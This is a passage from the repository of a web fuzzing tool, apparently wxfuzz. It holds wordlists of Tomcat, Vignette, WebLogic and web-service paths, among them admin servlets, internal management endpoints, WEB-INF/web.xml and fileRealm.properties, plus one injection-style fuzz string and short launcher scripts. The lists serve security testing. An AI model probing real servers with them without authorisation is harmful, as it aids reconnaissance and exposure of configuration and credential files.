servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet 31 | servlet/org.apache.catalina.servlets.ManagerServlet 32 | servlet/org.apache.catalina.servlets.HTMLManagerServlet 33 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet 34 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 35 | servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 36 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif 37 | ?a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c=1 38 | -------------------------------------------------------------------------------- /wordlist/vulns/vignette.txt: -------------------------------------------------------------------------------- 1 | 0,,,00 2 | 0,,,00.html 3 | 1,,,00 4 | 1,,,00.html 5 | CDA 6 | CDS 7 | CMA 8 | CMS 9 | Deleting 10 | Docs 11 | Editing 12 | HOME 13 | Images 14 | Internal 15 | MetaDataUpdate 16 | Report 17 | Select 18 | StoryServer 19 | TMT 20 | VGN 21 | XML 22 | ac 23 | allvars 24 | asp 25 | aspstatus 26 | cda 27 | cds 28 | cma 29 | cms 30 | controller 31 | diag 32 | docs 33 | edit 34 | error 35 | errorpage 36 | errors 37 | executequery 38 | external 39 | home 40 | ibm 41 | initialize 42 | internal 43 | jsp 44 | jspstatus 45 | jsptest 46 | legacy 47 | license 48 | listcolumns 49 | login 50 | loginlogo 51 | logo 52 | main 53 | menu 54 | metadataupdate 55 | performance 56 | portal 57 | ppstats 58 | preview 59 | previewer 60 | record 61 | reset 62 | save 63 | stat 64 | status 65 | storyserver 66 | style 67 | stylepreviewer 68 | utils 69 | vdc 70 | vgn 71 | vr 72 | Ping.jsp 73 | HelloWorld.jsp 74 | 75 | -------------------------------------------------------------------------------- /wordlist/vulns/weblogic.txt: -------------------------------------------------------------------------------- 1 | * 2 | *.gif 3 | *.gif/ 4 | *.html 5 | *.jsp 6 | 
*.jsp/ 7 | *.jws 8 | *.shtml/ 9 | AdminCaptureRootCA 10 | AdminClients 11 | AdminConnections 12 | AdminEvents 13 | AdminJDBC 14 | AdminLicense 15 | AdminMain 16 | AdminProps 17 | AdminRealm 18 | AdminThreads 19 | AdminVersion 20 | BizTalkServer 21 | Bootstrap 22 | Certificate 23 | Classpath/ 24 | ConsoleHelp/ 25 | ConsoleHelp 26 | DefaultWebApp 27 | HTTPClntClose 28 | HTTPClntLogin 29 | HTTPClntRecv 30 | HTTPClntSend 31 | LogfileSearch 32 | LogfileTail 33 | Login.jsp 34 | MANIFEST.MF 35 | META-INF 36 | SimpappServlet 37 | StockServlet 38 | T3AdminMain 39 | UniversityServlet 40 | WEB-INF 41 | WEB-INF./web.xml 42 | WEB-INF/web.xml 43 | WLDummyInitJVMIDs 44 | WebServiceServlet 45 | _tmp_war 46 | _tmp_war_DefaultWebApp 47 | a2e2gp2r2/x.jsp 48 | actions 49 | admin/login.do 50 | applet 51 | applications 52 | authenticatedy 53 | bea_wls_internal/classes/ 54 | bea_wls_internal/classes/ 55 | bea_wls_internal/WebServiceServlet 56 | bea_wls_internal/getior 57 | bea_wls_internal 58 | bea_wls_internal/HTTPClntSend 59 | bea_wls_internal/HTTPClntRecv 60 | bea_wls_internal/iiop/ClientSend 61 | bea_wls_internal/iiop/ClientRecv 62 | bea_wls_internal/iiop/ClientLogin 63 | bea_wls_internal/WLDummyInitJVMIDs 64 | bea_wls_internal/a2e2gp2r2/x.jsp 65 | bea_wls_internal/psquare/x.jsp 66 | bea_wls_internal/iiop/ClientClose 67 | beanManaged 68 | certificate 69 | classes 70 | classes/ 71 | com 72 | common 73 | config 74 | console 75 | cookies 76 | default 77 | docs51 78 | domain 79 | drp-exports 80 | drp-publish 81 | dummy 82 | e2ePortalProject/Login.portal 83 | ejb 84 | ejbSimpappServlet 85 | error 86 | examplesWebApp/EJBeanManagedClient.jsp 87 | examplesWebApp/WebservicesEJB.jsp 88 | examplesWebApp/OrderParser.jsp?xmlfile=C:/bea/weblogic81/samples/server/examples/src/examples/xml/orderParser/order.xml 89 | examplesWebApp/index.jsp 90 | examplesWebApp/InteractiveQuery.jsp 91 | examplesWebApp/SessionServlet 92 | fault 93 | file 94 | file/ 95 | fileRealm 96 | fileRealm.properties 97 | getior 
98 | graphics 99 | helloKona 100 | helloWorld 101 | iiop/ClientClose 102 | iiop/ClientRecv 103 | iiop/ClientLogin 104 | iiop/ClientSend 105 | images 106 | index 107 | index.jsp 108 | internal 109 | jmssender 110 | jmstrader 111 | jspbuild 112 | jwsdir 113 | login.jsp 114 | manifest.mf 115 | mapping 116 | mydomain 117 | myservlet 118 | page 119 | patient/login.do 120 | patient/register.do 121 | phone 122 | physican/login.do 123 | portalAppAdmin/login.jsp 124 | properties 125 | proxy 126 | psquare/x.jsp 127 | public_html 128 | servlet 129 | servletimages 130 | servlets/ 131 | session 132 | simpapp 133 | simple 134 | simpleFormServlet 135 | snoop 136 | survey 137 | system 138 | taglib-uri 139 | uddi 140 | uddi/uddilistener 141 | uddiexplorer 142 | uddilistener 143 | utils 144 | web 145 | web.xml 146 | weblogic 147 | weblogic.properties 148 | weblogic.xml 149 | webservice 150 | webshare 151 | wl_management_internal2/FileDistribution 152 | wl_management_internal2/Bootstrap 153 | wl_management_internal2/Admin 154 | wl_management_internal2/wl_management 155 | wl_management_internal1/LogfileTail 156 | wl_management_internal1/LogfileSearch 157 | wl_management_internal1 158 | wl_management 159 | wl_management_internal2 160 | wliconsole 161 | wlserver 162 | -------------------------------------------------------------------------------- /wordlist/webservices/ws-dirs.txt: -------------------------------------------------------------------------------- 1 | ServiceDefinition 2 | admin 3 | atom 4 | axis 5 | context 6 | default 7 | disco 8 | extwsdl 9 | index 10 | inquire 11 | inquiryapi 12 | inspection 13 | interface 14 | interfaces 15 | jboss-net 16 | jbossws 17 | juddi 18 | manual 19 | methods 20 | name 21 | names 22 | operation 23 | operations 24 | oracle 25 | proxy 26 | publish 27 | publishing 28 | query 29 | rss 30 | service 31 | services 32 | svce 33 | uddi 34 | uddiexplorer 35 | uddigui 36 | uddilistener 37 | uddisoap 38 | webservice 39 | webserviceclient 40 | 
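webserviceclient+ssl 41 | webservices 42 | ws 43 | ws4ee 44 | wsatom 45 | wsdl 46 | wsgw 47 | wsil 48 | xmethods 49 | -------------------------------------------------------------------------------- /wordlist/webservices/ws-files.txt: -------------------------------------------------------------------------------- 1 | 2 | .asmx 3 | .asmx?wsdl 4 | .aspx 5 | .atom 6 | .disco 7 | .html 8 | .java 9 | .jsp 10 | .jws 11 | .jws?wsdl 12 | .php 13 | .pl 14 | .py 15 | .rss 16 | .svc 17 | .wsdl 18 | ?disco 19 | ?wsdl 20 | -------------------------------------------------------------------------------- /wxfuzz: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # Pass arguments through quoted so payloads and URLs containing spaces or glob characters are not re-split or expanded by the shell. 3 | python src/wxfuzz.py "$@" 4 | -------------------------------------------------------------------------------- /wxfuzz.bat: -------------------------------------------------------------------------------- 1 | call python src\wxfuzz.py %* 2 | --------------------------------------------------------------------------------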